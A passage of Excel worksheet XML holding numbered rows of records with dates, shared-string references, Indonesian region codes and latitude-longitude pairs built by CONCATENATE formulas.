        <v>8602</v>
      </c>
      <c r="S2557" t="s">
        <v>1464</v>
      </c>
      <c r="T2557" t="s">
        <v>42</v>
      </c>
      <c r="U2557" s="5">
        <v>10758841</v>
      </c>
      <c r="V2557" s="5" t="s">
        <v>16740</v>
      </c>
      <c r="W2557" s="5">
        <v>-689113</v>
      </c>
      <c r="X2557" t="s">
        <v>20481</v>
      </c>
      <c r="Y2557" t="str">
        <f t="shared" si="39"/>
        <v>-6.89113,107.58841</v>
      </c>
    </row>
    <row r="2558" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2558">
        <v>224675</v>
      </c>
      <c r="B2558" s="1">
        <v>44189</v>
      </c>
      <c r="C2558" s="2">
        <v>0.50730324074074074</v>
      </c>
      <c r="D2558" t="s">
        <v>22</v>
      </c>
      <c r="E2558" t="s">
        <v>23</v>
      </c>
      <c r="F2558" t="s">
        <v>8603</v>
      </c>
      <c r="G2558" t="s">
        <v>8604</v>
      </c>
      <c r="H2558" t="s">
        <v>26</v>
      </c>
      <c r="I2558" t="s">
        <v>8605</v>
      </c>
      <c r="J2558" t="s">
        <v>2627</v>
      </c>
      <c r="L2558" t="s">
        <v>8606</v>
      </c>
      <c r="M2558">
        <v>3273190004</v>
      </c>
      <c r="N2558">
        <v>3273190</v>
      </c>
      <c r="O2558">
        <v>3273</v>
      </c>
      <c r="P2558">
        <v>32</v>
      </c>
      <c r="Q2558" t="s">
        <v>8607</v>
      </c>
      <c r="R2558" t="s">
        <v>8608</v>
      </c>
      <c r="S2558" t="s">
        <v>1464</v>
      </c>
      <c r="T2558" t="s">
        <v>42</v>
      </c>
      <c r="U2558" s="5">
        <v>10758544</v>
      </c>
      <c r="V2558" s="5" t="s">
        <v>16741</v>
      </c>
      <c r="W2558" s="5">
        <v>-689288</v>
      </c>
      <c r="X2558" t="s">
        <v>20482</v>
      </c>
      <c r="Y2558" t="str">
        <f t="shared" si="39"/>
        <v>-6.89288,107.58544</v>
      </c>
    </row>
    <row r="2559" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2559">
        <v>224676</v>
      </c>
      <c r="B2559" s="1">
        <v>44189</v>
      </c>
      <c r="C2559" s="2">
        <v>0.53728009259259257</v>
      </c>
      <c r="D2559" t="s">
        <v>22</v>
      </c>
      <c r="E2559" t="s">
        <v>23</v>
      </c>
      <c r="F2559" t="s">
        <v>8609</v>
      </c>
      <c r="H2559" t="s">
        <v>26</v>
      </c>
      <c r="I2559" t="s">
        <v>2165</v>
      </c>
      <c r="J2559" t="s">
        <v>2627</v>
      </c>
      <c r="L2559" t="s">
        <v>8610</v>
      </c>
      <c r="M2559">
        <v>3273111002</v>
      </c>
      <c r="N2559">
        <v>3273111</v>
      </c>
      <c r="O2559">
        <v>3273</v>
      </c>
      <c r="P2559">
        <v>32</v>
      </c>
      <c r="Q2559" t="s">
        <v>6784</v>
      </c>
      <c r="R2559" t="s">
        <v>6785</v>
      </c>
      <c r="S2559" t="s">
        <v>1464</v>
      </c>
      <c r="T2559" t="s">
        <v>42</v>
      </c>
      <c r="U2559" s="5">
        <v>10771176</v>
      </c>
      <c r="V2559" s="5" t="s">
        <v>16742</v>
      </c>
      <c r="W2559" s="5">
        <v>-694175</v>
      </c>
      <c r="X2559" t="s">
        <v>20483</v>
      </c>
      <c r="Y2559" t="str">
        <f t="shared" si="39"/>
        <v>-6.94175,107.71176</v>
      </c>
    </row>
    <row r="2560" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2560">
        <v>224677</v>
      </c>
      <c r="B2560" s="1">
        <v>44191</v>
      </c>
      <c r="C2560" s="2">
        <v>0.28333333333333333</v>
      </c>
      <c r="D2560" t="s">
        <v>2648</v>
      </c>
      <c r="E2560" t="s">
        <v>23</v>
      </c>
      <c r="G2560" t="s">
        <v>8611</v>
      </c>
      <c r="H2560" t="s">
        <v>26</v>
      </c>
      <c r="J2560" t="s">
        <v>7956</v>
      </c>
      <c r="L2560" t="s">
        <v>8612</v>
      </c>
      <c r="M2560">
        <v>3175020003</v>
      </c>
      <c r="N2560">
        <v>3175020</v>
      </c>
      <c r="O2560">
        <v>3175</v>
      </c>
      <c r="P2560">
        <v>31</v>
      </c>
      <c r="Q2560" t="s">
        <v>2667</v>
      </c>
      <c r="R2560" t="s">
        <v>2228</v>
      </c>
      <c r="S2560" t="s">
        <v>547</v>
      </c>
      <c r="T2560" t="s">
        <v>33</v>
      </c>
      <c r="U2560" s="5">
        <v>10682240</v>
      </c>
      <c r="V2560" s="5" t="s">
        <v>15072</v>
      </c>
      <c r="W2560" s="5">
        <v>-613196</v>
      </c>
      <c r="X2560" t="s">
        <v>20484</v>
      </c>
      <c r="Y2560" t="str">
        <f t="shared" si="39"/>
        <v>-6.13196,106.82240</v>
      </c>
    </row>
    <row r="2561" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2561">
        <v>224681</v>
      </c>
      <c r="B2561" s="1">
        <v>44191</v>
      </c>
      <c r="C2561" s="2">
        <v>0.28263888888888888</v>
      </c>
      <c r="D2561" t="s">
        <v>2648</v>
      </c>
      <c r="E2561" t="s">
        <v>23</v>
      </c>
      <c r="G2561" t="s">
        <v>8613</v>
      </c>
      <c r="H2561" t="s">
        <v>26</v>
      </c>
      <c r="J2561" t="s">
        <v>7956</v>
      </c>
      <c r="L2561" t="s">
        <v>8614</v>
      </c>
      <c r="M2561">
        <v>3175020003</v>
      </c>
      <c r="N2561">
        <v>3175020</v>
      </c>
      <c r="O2561">
        <v>3175</v>
      </c>
      <c r="P2561">
        <v>31</v>
      </c>
      <c r="Q2561" t="s">
        <v>2667</v>
      </c>
      <c r="R2561" t="s">
        <v>2228</v>
      </c>
      <c r="S2561" t="s">
        <v>547</v>
      </c>
      <c r="T2561" t="s">
        <v>33</v>
      </c>
      <c r="U2561" s="5">
        <v>10682237</v>
      </c>
      <c r="V2561" s="5" t="s">
        <v>16743</v>
      </c>
      <c r="W2561" s="5">
        <v>-613206</v>
      </c>
      <c r="X2561" t="s">
        <v>20303</v>
      </c>
      <c r="Y2561" t="str">
        <f t="shared" si="39"/>
        <v>-6.13206,106.82237</v>
      </c>
    </row>
    <row r="2562" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2562">
        <v>225571</v>
      </c>
      <c r="B2562" s="1">
        <v>44193</v>
      </c>
      <c r="C2562" s="2">
        <v>0.25807870370370373</v>
      </c>
      <c r="D2562" t="s">
        <v>22</v>
      </c>
      <c r="E2562" t="s">
        <v>23</v>
      </c>
      <c r="F2562" t="s">
        <v>8615</v>
      </c>
      <c r="G2562" t="s">
        <v>8616</v>
      </c>
      <c r="H2562" t="s">
        <v>26</v>
      </c>
      <c r="I2562" t="s">
        <v>137</v>
      </c>
      <c r="J2562" t="s">
        <v>2622</v>
      </c>
      <c r="L2562" t="s">
        <v>8617</v>
      </c>
      <c r="M2562">
        <v>3525060008</v>
      </c>
      <c r="N2562">
        <v>3525060</v>
      </c>
      <c r="O2562">
        <v>3525</v>
      </c>
      <c r="P2562">
        <v>35</v>
      </c>
      <c r="Q2562" t="s">
        <v>8540</v>
      </c>
      <c r="R2562" t="s">
        <v>1367</v>
      </c>
      <c r="S2562" t="s">
        <v>1368</v>
      </c>
      <c r="T2562" t="s">
        <v>1221</v>
      </c>
      <c r="U2562" s="5">
        <v>11248914</v>
      </c>
      <c r="V2562" s="5" t="s">
        <v>16744</v>
      </c>
      <c r="W2562" s="5">
        <v>-725631</v>
      </c>
      <c r="X2562" t="s">
        <v>20485</v>
      </c>
      <c r="Y2562" t="str">
        <f t="shared" si="39"/>
        <v>-7.25631,112.48914</v>
      </c>
    </row>
    <row r="2563" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2563">
        <v>225572</v>
      </c>
      <c r="B2563" s="1">
        <v>44193</v>
      </c>
      <c r="C2563" s="2">
        <v>0.49696759259259254</v>
      </c>
      <c r="D2563" t="s">
        <v>22</v>
      </c>
      <c r="E2563" t="s">
        <v>23</v>
      </c>
      <c r="F2563" t="s">
        <v>8618</v>
      </c>
      <c r="G2563" t="s">
        <v>8619</v>
      </c>
      <c r="H2563" t="s">
        <v>26</v>
      </c>
      <c r="I2563" t="s">
        <v>367</v>
      </c>
      <c r="J2563" t="s">
        <v>2622</v>
      </c>
      <c r="L2563" t="s">
        <v>8620</v>
      </c>
      <c r="M2563">
        <v>3578280006</v>
      </c>
      <c r="N2563">
        <v>3578280</v>
      </c>
      <c r="O2563">
        <v>3578</v>
      </c>
      <c r="P2563">
        <v>35</v>
      </c>
      <c r="Q2563" t="s">
        <v>6388</v>
      </c>
      <c r="R2563" t="s">
        <v>6389</v>
      </c>
      <c r="S2563" t="s">
        <v>1346</v>
      </c>
      <c r="T2563" t="s">
        <v>1221</v>
      </c>
      <c r="U2563" s="5">
        <v>11265890</v>
      </c>
      <c r="V2563" s="5" t="s">
        <v>16745</v>
      </c>
      <c r="W2563" s="5">
        <v>-725734</v>
      </c>
      <c r="X2563" t="s">
        <v>20486</v>
      </c>
      <c r="Y2563" t="str">
        <f t="shared" ref="Y2563:Y2626" si="40">CONCATENATE(X2563,",",V2563)</f>
        <v>-7.25734,112.65890</v>
      </c>
    </row>
    <row r="2564" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2564">
        <v>225573</v>
      </c>
      <c r="B2564" s="1">
        <v>44193</v>
      </c>
      <c r="C2564" s="2">
        <v>0.51666666666666672</v>
      </c>
      <c r="D2564" t="s">
        <v>2648</v>
      </c>
      <c r="E2564" t="s">
        <v>23</v>
      </c>
      <c r="G2564" t="s">
        <v>8621</v>
      </c>
      <c r="H2564" t="s">
        <v>26</v>
      </c>
      <c r="J2564" t="s">
        <v>2622</v>
      </c>
      <c r="L2564" t="s">
        <v>8622</v>
      </c>
      <c r="M2564">
        <v>3578240005</v>
      </c>
      <c r="N2564">
        <v>3578240</v>
      </c>
      <c r="O2564">
        <v>3578</v>
      </c>
      <c r="P2564">
        <v>35</v>
      </c>
      <c r="Q2564" t="s">
        <v>6306</v>
      </c>
      <c r="R2564" t="s">
        <v>6307</v>
      </c>
      <c r="S2564" t="s">
        <v>1346</v>
      </c>
      <c r="T2564" t="s">
        <v>1221</v>
      </c>
      <c r="U2564" s="5">
        <v>11273049</v>
      </c>
      <c r="V2564" s="5" t="s">
        <v>16746</v>
      </c>
      <c r="W2564" s="5">
        <v>-720845</v>
      </c>
      <c r="X2564" t="s">
        <v>20487</v>
      </c>
      <c r="Y2564" t="str">
        <f t="shared" si="40"/>
        <v>-7.20845,112.73049</v>
      </c>
    </row>
    <row r="2565" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2565">
        <v>225574</v>
      </c>
      <c r="B2565" s="1">
        <v>44193</v>
      </c>
      <c r="C2565" s="2">
        <v>0.52072916666666669</v>
      </c>
      <c r="D2565" t="s">
        <v>22</v>
      </c>
      <c r="E2565" t="s">
        <v>23</v>
      </c>
      <c r="F2565" t="s">
        <v>8623</v>
      </c>
      <c r="G2565" t="s">
        <v>8624</v>
      </c>
      <c r="H2565" t="s">
        <v>26</v>
      </c>
      <c r="I2565" t="s">
        <v>137</v>
      </c>
      <c r="J2565" t="s">
        <v>2622</v>
      </c>
      <c r="L2565" t="s">
        <v>8625</v>
      </c>
      <c r="M2565">
        <v>3578160006</v>
      </c>
      <c r="N2565">
        <v>3578160</v>
      </c>
      <c r="O2565">
        <v>3578</v>
      </c>
      <c r="P2565">
        <v>35</v>
      </c>
      <c r="Q2565" t="s">
        <v>1964</v>
      </c>
      <c r="R2565" t="s">
        <v>1884</v>
      </c>
      <c r="S2565" t="s">
        <v>1346</v>
      </c>
      <c r="T2565" t="s">
        <v>1221</v>
      </c>
      <c r="U2565" s="5">
        <v>11271041</v>
      </c>
      <c r="V2565" s="5" t="s">
        <v>16747</v>
      </c>
      <c r="W2565" s="5">
        <v>-726797</v>
      </c>
      <c r="X2565" t="s">
        <v>20488</v>
      </c>
      <c r="Y2565" t="str">
        <f t="shared" si="40"/>
        <v>-7.26797,112.71041</v>
      </c>
    </row>
    <row r="2566" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2566">
        <v>225579</v>
      </c>
      <c r="B2566" s="1">
        <v>44193</v>
      </c>
      <c r="C2566" s="2">
        <v>0.92577546296296298</v>
      </c>
      <c r="D2566" t="s">
        <v>22</v>
      </c>
      <c r="E2566" t="s">
        <v>23</v>
      </c>
      <c r="F2566" t="s">
        <v>8626</v>
      </c>
      <c r="G2566" t="s">
        <v>8627</v>
      </c>
      <c r="H2566" t="s">
        <v>26</v>
      </c>
      <c r="I2566" t="s">
        <v>166</v>
      </c>
      <c r="J2566" t="s">
        <v>2622</v>
      </c>
      <c r="L2566" t="s">
        <v>8628</v>
      </c>
      <c r="M2566">
        <v>3525050004</v>
      </c>
      <c r="N2566">
        <v>3525050</v>
      </c>
      <c r="O2566">
        <v>3525</v>
      </c>
      <c r="P2566">
        <v>35</v>
      </c>
      <c r="Q2566" t="s">
        <v>8629</v>
      </c>
      <c r="R2566" t="s">
        <v>8630</v>
      </c>
      <c r="S2566" t="s">
        <v>1368</v>
      </c>
      <c r="T2566" t="s">
        <v>1221</v>
      </c>
      <c r="U2566" s="5">
        <v>11254983</v>
      </c>
      <c r="V2566" s="5" t="s">
        <v>16748</v>
      </c>
      <c r="W2566" s="5">
        <v>-725304</v>
      </c>
      <c r="X2566" t="s">
        <v>20489</v>
      </c>
      <c r="Y2566" t="str">
        <f t="shared" si="40"/>
        <v>-7.25304,112.54983</v>
      </c>
    </row>
    <row r="2567" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2567">
        <v>225580</v>
      </c>
      <c r="B2567" s="1">
        <v>44193</v>
      </c>
      <c r="C2567" s="2">
        <v>0.98638888888888887</v>
      </c>
      <c r="D2567" t="s">
        <v>22</v>
      </c>
      <c r="E2567" t="s">
        <v>23</v>
      </c>
      <c r="F2567" t="s">
        <v>8631</v>
      </c>
      <c r="G2567" t="s">
        <v>8632</v>
      </c>
      <c r="H2567" t="s">
        <v>26</v>
      </c>
      <c r="I2567" t="s">
        <v>197</v>
      </c>
      <c r="J2567" t="s">
        <v>2627</v>
      </c>
      <c r="L2567" t="s">
        <v>8633</v>
      </c>
      <c r="M2567">
        <v>3209220007</v>
      </c>
      <c r="N2567">
        <v>3209220</v>
      </c>
      <c r="O2567">
        <v>3209</v>
      </c>
      <c r="P2567">
        <v>32</v>
      </c>
      <c r="Q2567" t="s">
        <v>7607</v>
      </c>
      <c r="R2567" t="s">
        <v>7607</v>
      </c>
      <c r="S2567" t="s">
        <v>6532</v>
      </c>
      <c r="T2567" t="s">
        <v>42</v>
      </c>
      <c r="U2567" s="5">
        <v>10837974</v>
      </c>
      <c r="V2567" s="5" t="s">
        <v>16749</v>
      </c>
      <c r="W2567" s="5">
        <v>-663024</v>
      </c>
      <c r="X2567" t="s">
        <v>20490</v>
      </c>
      <c r="Y2567" t="str">
        <f t="shared" si="40"/>
        <v>-6.63024,108.37974</v>
      </c>
    </row>
    <row r="2568" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2568">
        <v>225583</v>
      </c>
      <c r="B2568" s="1">
        <v>44195</v>
      </c>
      <c r="C2568" s="2">
        <v>0.49274305555555559</v>
      </c>
      <c r="D2568" t="s">
        <v>22</v>
      </c>
      <c r="E2568" t="s">
        <v>23</v>
      </c>
      <c r="F2568" t="s">
        <v>8634</v>
      </c>
      <c r="G2568" t="s">
        <v>8635</v>
      </c>
      <c r="H2568" t="s">
        <v>26</v>
      </c>
      <c r="I2568" t="s">
        <v>974</v>
      </c>
      <c r="J2568" t="s">
        <v>2622</v>
      </c>
      <c r="L2568" t="s">
        <v>8636</v>
      </c>
      <c r="M2568">
        <v>3515140013</v>
      </c>
      <c r="N2568">
        <v>3515140</v>
      </c>
      <c r="O2568">
        <v>3515</v>
      </c>
      <c r="P2568">
        <v>35</v>
      </c>
      <c r="Q2568" t="s">
        <v>8637</v>
      </c>
      <c r="R2568" t="s">
        <v>1927</v>
      </c>
      <c r="S2568" t="s">
        <v>1928</v>
      </c>
      <c r="T2568" t="s">
        <v>1221</v>
      </c>
      <c r="U2568" s="5">
        <v>11276377</v>
      </c>
      <c r="V2568" s="5" t="s">
        <v>16750</v>
      </c>
      <c r="W2568" s="5">
        <v>-735266</v>
      </c>
      <c r="X2568" t="s">
        <v>20491</v>
      </c>
      <c r="Y2568" t="str">
        <f t="shared" si="40"/>
        <v>-7.35266,112.76377</v>
      </c>
    </row>
    <row r="2569" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2569">
        <v>225584</v>
      </c>
      <c r="B2569" s="1">
        <v>44195</v>
      </c>
      <c r="C2569" s="2">
        <v>0.86835648148148137</v>
      </c>
      <c r="D2569" t="s">
        <v>22</v>
      </c>
      <c r="E2569" t="s">
        <v>23</v>
      </c>
      <c r="F2569" t="s">
        <v>8638</v>
      </c>
      <c r="H2569" t="s">
        <v>26</v>
      </c>
      <c r="I2569" t="s">
        <v>1340</v>
      </c>
      <c r="J2569" t="s">
        <v>8639</v>
      </c>
      <c r="L2569" t="s">
        <v>250</v>
      </c>
      <c r="M2569">
        <v>1505050003</v>
      </c>
      <c r="N2569">
        <v>1505050</v>
      </c>
      <c r="O2569">
        <v>1505</v>
      </c>
      <c r="P2569">
        <v>15</v>
      </c>
      <c r="Q2569" t="s">
        <v>8640</v>
      </c>
      <c r="R2569" t="s">
        <v>8641</v>
      </c>
      <c r="S2569" t="s">
        <v>8642</v>
      </c>
      <c r="T2569" t="s">
        <v>8643</v>
      </c>
      <c r="U2569" s="5">
        <v>10356824</v>
      </c>
      <c r="V2569" s="5" t="s">
        <v>16751</v>
      </c>
      <c r="W2569" s="5">
        <v>-167355</v>
      </c>
      <c r="X2569" t="s">
        <v>20492</v>
      </c>
      <c r="Y2569" t="str">
        <f t="shared" si="40"/>
        <v>-1.67355,103.56824</v>
      </c>
    </row>
    <row r="2570" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2570">
        <v>225619</v>
      </c>
      <c r="B2570" s="1">
        <v>44197</v>
      </c>
      <c r="C2570" s="2">
        <v>0.11493055555555555</v>
      </c>
      <c r="D2570" t="s">
        <v>22</v>
      </c>
      <c r="E2570" t="s">
        <v>23</v>
      </c>
      <c r="F2570" t="s">
        <v>8644</v>
      </c>
      <c r="H2570" t="s">
        <v>26</v>
      </c>
      <c r="I2570" t="s">
        <v>117</v>
      </c>
      <c r="J2570" t="s">
        <v>2622</v>
      </c>
      <c r="L2570" t="s">
        <v>2794</v>
      </c>
      <c r="M2570">
        <v>3525050013</v>
      </c>
      <c r="N2570">
        <v>3525050</v>
      </c>
      <c r="O2570">
        <v>3525</v>
      </c>
      <c r="P2570">
        <v>35</v>
      </c>
      <c r="Q2570" t="s">
        <v>8645</v>
      </c>
      <c r="R2570" t="s">
        <v>8630</v>
      </c>
      <c r="S2570" t="s">
        <v>1368</v>
      </c>
      <c r="T2570" t="s">
        <v>1221</v>
      </c>
      <c r="U2570" s="5">
        <v>11255938</v>
      </c>
      <c r="V2570" s="5" t="s">
        <v>16752</v>
      </c>
      <c r="W2570" s="5">
        <v>-724237</v>
      </c>
      <c r="X2570" t="s">
        <v>20493</v>
      </c>
      <c r="Y2570" t="str">
        <f t="shared" si="40"/>
        <v>-7.24237,112.55938</v>
      </c>
    </row>
    <row r="2571" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2571">
        <v>225620</v>
      </c>
      <c r="B2571" s="1">
        <v>44197</v>
      </c>
      <c r="C2571" s="2">
        <v>0.25395833333333334</v>
      </c>
      <c r="D2571" t="s">
        <v>22</v>
      </c>
      <c r="E2571" t="s">
        <v>23</v>
      </c>
      <c r="F2571" t="s">
        <v>8646</v>
      </c>
      <c r="H2571" t="s">
        <v>7086</v>
      </c>
      <c r="I2571" t="s">
        <v>7623</v>
      </c>
      <c r="J2571" t="s">
        <v>8647</v>
      </c>
      <c r="L2571" t="s">
        <v>8648</v>
      </c>
      <c r="M2571">
        <v>3374160008</v>
      </c>
      <c r="N2571">
        <v>3374160</v>
      </c>
      <c r="O2571">
        <v>3374</v>
      </c>
      <c r="P2571">
        <v>33</v>
      </c>
      <c r="Q2571" t="s">
        <v>8649</v>
      </c>
      <c r="R2571" t="s">
        <v>2120</v>
      </c>
      <c r="S2571" t="s">
        <v>1334</v>
      </c>
      <c r="T2571" t="s">
        <v>1134</v>
      </c>
      <c r="U2571" s="5">
        <v>11034493</v>
      </c>
      <c r="V2571" s="5" t="s">
        <v>16753</v>
      </c>
      <c r="W2571" s="5">
        <v>-699794</v>
      </c>
      <c r="X2571" t="s">
        <v>20494</v>
      </c>
      <c r="Y2571" t="str">
        <f t="shared" si="40"/>
        <v>-6.99794,110.34493</v>
      </c>
    </row>
    <row r="2572" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2572">
        <v>225621</v>
      </c>
      <c r="B2572" s="1">
        <v>44198</v>
      </c>
      <c r="C2572" s="2">
        <v>4.9548611111111113E-2</v>
      </c>
      <c r="D2572" t="s">
        <v>22</v>
      </c>
      <c r="E2572" t="s">
        <v>23</v>
      </c>
      <c r="F2572" t="s">
        <v>8650</v>
      </c>
      <c r="H2572" t="s">
        <v>26</v>
      </c>
      <c r="I2572" t="s">
        <v>5309</v>
      </c>
      <c r="J2572" t="s">
        <v>2622</v>
      </c>
      <c r="L2572" t="s">
        <v>8651</v>
      </c>
      <c r="M2572">
        <v>3525050017</v>
      </c>
      <c r="N2572">
        <v>3525050</v>
      </c>
      <c r="O2572">
        <v>3525</v>
      </c>
      <c r="P2572">
        <v>35</v>
      </c>
      <c r="Q2572" t="s">
        <v>8652</v>
      </c>
      <c r="R2572" t="s">
        <v>8630</v>
      </c>
      <c r="S2572" t="s">
        <v>1368</v>
      </c>
      <c r="T2572" t="s">
        <v>1221</v>
      </c>
      <c r="U2572" s="5">
        <v>11258008</v>
      </c>
      <c r="V2572" s="5" t="s">
        <v>16754</v>
      </c>
      <c r="W2572" s="5">
        <v>-720284</v>
      </c>
      <c r="X2572" t="s">
        <v>20495</v>
      </c>
      <c r="Y2572" t="str">
        <f t="shared" si="40"/>
        <v>-7.20284,112.58008</v>
      </c>
    </row>
    <row r="2573" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2573">
        <v>225622</v>
      </c>
      <c r="B2573" s="1">
        <v>44201</v>
      </c>
      <c r="C2573" s="2">
        <v>0.74375000000000002</v>
      </c>
      <c r="D2573" t="s">
        <v>2648</v>
      </c>
      <c r="E2573" t="s">
        <v>23</v>
      </c>
      <c r="G2573" t="s">
        <v>8653</v>
      </c>
      <c r="H2573" t="s">
        <v>26</v>
      </c>
      <c r="J2573" t="s">
        <v>8654</v>
      </c>
      <c r="L2573" t="s">
        <v>8655</v>
      </c>
      <c r="M2573">
        <v>3174010003</v>
      </c>
      <c r="N2573">
        <v>3174010</v>
      </c>
      <c r="O2573">
        <v>3174</v>
      </c>
      <c r="P2573">
        <v>31</v>
      </c>
      <c r="Q2573" t="s">
        <v>5732</v>
      </c>
      <c r="R2573" t="s">
        <v>69</v>
      </c>
      <c r="S2573" t="s">
        <v>32</v>
      </c>
      <c r="T2573" t="s">
        <v>33</v>
      </c>
      <c r="U2573" s="5">
        <v>10672547</v>
      </c>
      <c r="V2573" s="5" t="s">
        <v>16755</v>
      </c>
      <c r="W2573" s="5">
        <v>-621218</v>
      </c>
      <c r="X2573" t="s">
        <v>20496</v>
      </c>
      <c r="Y2573" t="str">
        <f t="shared" si="40"/>
        <v>-6.21218,106.72547</v>
      </c>
    </row>
    <row r="2574" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2574">
        <v>225632</v>
      </c>
      <c r="B2574" s="1">
        <v>44201</v>
      </c>
      <c r="C2574" s="2">
        <v>0.77222222222222225</v>
      </c>
      <c r="D2574" t="s">
        <v>2648</v>
      </c>
      <c r="E2574" t="s">
        <v>23</v>
      </c>
      <c r="G2574" t="s">
        <v>8656</v>
      </c>
      <c r="H2574" t="s">
        <v>26</v>
      </c>
      <c r="J2574" t="s">
        <v>8654</v>
      </c>
      <c r="L2574" t="s">
        <v>8657</v>
      </c>
      <c r="M2574">
        <v>3174010003</v>
      </c>
      <c r="N2574">
        <v>3174010</v>
      </c>
      <c r="O2574">
        <v>3174</v>
      </c>
      <c r="P2574">
        <v>31</v>
      </c>
      <c r="Q2574" t="s">
        <v>5732</v>
      </c>
      <c r="R2574" t="s">
        <v>69</v>
      </c>
      <c r="S2574" t="s">
        <v>32</v>
      </c>
      <c r="T2574" t="s">
        <v>33</v>
      </c>
      <c r="U2574" s="5">
        <v>10672540</v>
      </c>
      <c r="V2574" s="5" t="s">
        <v>15762</v>
      </c>
      <c r="W2574" s="5">
        <v>-621212</v>
      </c>
      <c r="X2574" t="s">
        <v>20497</v>
      </c>
      <c r="Y2574" t="str">
        <f t="shared" si="40"/>
        <v>-6.21212,106.72540</v>
      </c>
    </row>
    <row r="2575" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2575">
        <v>225965</v>
      </c>
      <c r="B2575" s="1">
        <v>44202</v>
      </c>
      <c r="C2575" s="2">
        <v>0.6159027777777778</v>
      </c>
      <c r="D2575" t="s">
        <v>22</v>
      </c>
      <c r="E2575" t="s">
        <v>23</v>
      </c>
      <c r="F2575" t="s">
        <v>8658</v>
      </c>
      <c r="H2575" t="s">
        <v>26</v>
      </c>
      <c r="I2575" t="s">
        <v>1633</v>
      </c>
      <c r="J2575" t="s">
        <v>2622</v>
      </c>
      <c r="L2575" t="s">
        <v>8659</v>
      </c>
      <c r="M2575">
        <v>3571010008</v>
      </c>
      <c r="N2575">
        <v>3571010</v>
      </c>
      <c r="O2575">
        <v>3571</v>
      </c>
      <c r="P2575">
        <v>35</v>
      </c>
      <c r="Q2575" t="s">
        <v>8660</v>
      </c>
      <c r="R2575" t="s">
        <v>8660</v>
      </c>
      <c r="S2575" t="s">
        <v>8365</v>
      </c>
      <c r="T2575" t="s">
        <v>1221</v>
      </c>
      <c r="U2575" s="5">
        <v>11200148</v>
      </c>
      <c r="V2575" s="5" t="s">
        <v>16756</v>
      </c>
      <c r="W2575" s="5">
        <v>-780512</v>
      </c>
      <c r="X2575" t="s">
        <v>20498</v>
      </c>
      <c r="Y2575" t="str">
        <f t="shared" si="40"/>
        <v>-7.80512,112.00148</v>
      </c>
    </row>
    <row r="2576" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2576">
        <v>226161</v>
      </c>
      <c r="B2576" s="1">
        <v>44203</v>
      </c>
      <c r="C2576" s="2">
        <v>0.44192129629629634</v>
      </c>
      <c r="D2576" t="s">
        <v>22</v>
      </c>
      <c r="E2576" t="s">
        <v>23</v>
      </c>
      <c r="F2576" t="s">
        <v>8661</v>
      </c>
      <c r="G2576" t="s">
        <v>8662</v>
      </c>
      <c r="H2576" t="s">
        <v>26</v>
      </c>
      <c r="I2576" t="s">
        <v>517</v>
      </c>
      <c r="J2576" t="s">
        <v>2622</v>
      </c>
      <c r="L2576" t="s">
        <v>8663</v>
      </c>
      <c r="M2576">
        <v>3515140007</v>
      </c>
      <c r="N2576">
        <v>3515140</v>
      </c>
      <c r="O2576">
        <v>3515</v>
      </c>
      <c r="P2576">
        <v>35</v>
      </c>
      <c r="Q2576" t="s">
        <v>8664</v>
      </c>
      <c r="R2576" t="s">
        <v>1927</v>
      </c>
      <c r="S2576" t="s">
        <v>1928</v>
      </c>
      <c r="T2576" t="s">
        <v>1221</v>
      </c>
      <c r="U2576" s="5">
        <v>11277219</v>
      </c>
      <c r="V2576" s="5" t="s">
        <v>16757</v>
      </c>
      <c r="W2576" s="5">
        <v>-736217</v>
      </c>
      <c r="X2576" t="s">
        <v>20499</v>
      </c>
      <c r="Y2576" t="str">
        <f t="shared" si="40"/>
        <v>-7.36217,112.77219</v>
      </c>
    </row>
    <row r="2577" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2577">
        <v>226162</v>
      </c>
      <c r="B2577" s="1">
        <v>44203</v>
      </c>
      <c r="C2577" s="2">
        <v>0.49049768518518522</v>
      </c>
      <c r="D2577" t="s">
        <v>22</v>
      </c>
      <c r="E2577" t="s">
        <v>23</v>
      </c>
      <c r="F2577" t="s">
        <v>8665</v>
      </c>
      <c r="G2577" t="s">
        <v>8666</v>
      </c>
      <c r="H2577" t="s">
        <v>26</v>
      </c>
      <c r="I2577" t="s">
        <v>1447</v>
      </c>
      <c r="J2577" t="s">
        <v>2622</v>
      </c>
      <c r="L2577" t="s">
        <v>8667</v>
      </c>
      <c r="M2577">
        <v>3517160006</v>
      </c>
      <c r="N2577">
        <v>3517160</v>
      </c>
      <c r="O2577">
        <v>3517</v>
      </c>
      <c r="P2577">
        <v>35</v>
      </c>
      <c r="Q2577" t="s">
        <v>8668</v>
      </c>
      <c r="R2577" t="s">
        <v>8669</v>
      </c>
      <c r="S2577" t="s">
        <v>340</v>
      </c>
      <c r="T2577" t="s">
        <v>1221</v>
      </c>
      <c r="U2577" s="5">
        <v>11238965</v>
      </c>
      <c r="V2577" s="5" t="s">
        <v>16758</v>
      </c>
      <c r="W2577" s="5">
        <v>-746943</v>
      </c>
      <c r="X2577" t="s">
        <v>20500</v>
      </c>
      <c r="Y2577" t="str">
        <f t="shared" si="40"/>
        <v>-7.46943,112.38965</v>
      </c>
    </row>
    <row r="2578" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2578">
        <v>226163</v>
      </c>
      <c r="B2578" s="1">
        <v>44203</v>
      </c>
      <c r="C2578" s="2">
        <v>0.50519675925925933</v>
      </c>
      <c r="D2578" t="s">
        <v>22</v>
      </c>
      <c r="E2578" t="s">
        <v>23</v>
      </c>
      <c r="F2578" t="s">
        <v>8670</v>
      </c>
      <c r="H2578" t="s">
        <v>26</v>
      </c>
